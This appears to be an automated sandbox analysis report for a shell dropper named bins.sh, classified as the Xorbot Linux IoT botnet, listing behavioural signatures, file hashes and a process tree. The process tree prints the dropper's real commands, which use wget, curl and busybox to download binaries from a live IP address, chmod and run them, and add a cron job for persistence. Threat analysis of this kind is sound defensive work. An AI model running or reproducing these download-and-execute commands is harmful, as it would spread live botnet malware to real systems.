Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    12/12/2024, 10:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    77f2788932c4fa92f7da10e0cf30b710

  • SHA1

    34231472e20b28c66b6cc03df92ba790c166f670

  • SHA256

    1a625fb6cd939030ba385771e066dbca31337a58ed8eb46007780d1f21e8a52c

  • SHA512

    660f2cc05d54b543ee7b78492f3949dbfc7421fc63eba4255fff73c14e8a9613f25387991e176f151722692fe24a8a53663ec9a29bdcac608850e629e7d217b6

  • SSDEEP

    192:1Tph4B98IjHWfPEsPhNA8FlK9hGm2KZUpxiN1jHWfPLFhNA+FlK9hW2KZUpxfHp6:Rph4B98IjHWfPEspFlK9hGmdZUpxiN14

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2219) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 29 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1515
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1516
        • /usr/bin/wget
          wget http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
          • Writes file to tmp directory
          PID:1517
        • /usr/bin/curl
          curl -O http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
          • Writes file to tmp directory
          PID:1522
        • /bin/busybox
          /bin/busybox wget http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
          • Writes file to tmp directory
          PID:1523
        • /bin/chmod
          chmod 777 P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
          • File and Directory Permissions Modification
          PID:1524
        • /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          ./P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
          • Executes dropped EXE
          PID:1525
        • /bin/rm
          rm P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
          2⤵
            PID:1527
          • /usr/bin/wget
            wget http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            2⤵
            • Writes file to tmp directory
            PID:1528
          • /usr/bin/curl
            curl -O http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            2⤵
            • Writes file to tmp directory
            PID:1529
          • /bin/busybox
            /bin/busybox wget http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            2⤵
            • Writes file to tmp directory
            PID:1530
          • /bin/chmod
            chmod 777 I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            2⤵
            • File and Directory Permissions Modification
            PID:1531
          • /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            ./I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
            2⤵
            • Executes dropped EXE
            • Renames itself
            • Reads runtime system information
            PID:1532
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:1534
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:1535
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:1536
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:1537
                • /bin/rm
                  rm I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
                  2⤵
                    PID:1539
                  • /usr/bin/wget
                    wget http://37.44.238.68/bins/lIAQvJv5Nr8iNWgZLhVX3C8ge5evZPbSAY
                    2⤵
                      PID:1542

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q
                    Filesize

                    112KB

                    MD5

                    05d7857dcead18bbd86d2935f591873c

                    SHA1

                    34d18f41ef35f93d5364ce3e24d74730a4e91985

                    SHA256

                    2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                    SHA512

                    d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                    Download Submit

                  • /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB
                    Filesize

                    117KB

                    MD5

                    849fa04ef88a8e8de32cb2e8538de5fe

                    SHA1

                    c768af29fe4b6695fff1541623e8bbd1c6f242f7

                    SHA256

                    8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

                    SHA512

                    2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

                    Download Submit

                  • /var/spool/cron/crontabs/tmp.n0JBQ1
                    Filesize

                    210B

                    MD5

                    0a72505ca22416d46223eb2ebaefa04f

                    SHA1

                    37486ec8d973f7de766bd523c55b6fb5187c8b99

                    SHA256

                    5ff571930a88acc2c9d2e9ac9d30502fa5f61e0fce0135a868dc5bec5733230b

                    SHA512

                    e5a8a0bb5215cb4cd819209c0ab93565783b50e5caf1bf176731db2d4acca6b3be59a729575b9d1badde7d5795ef2071d13597ae9753890fc577015a5662202f

                    Download Submit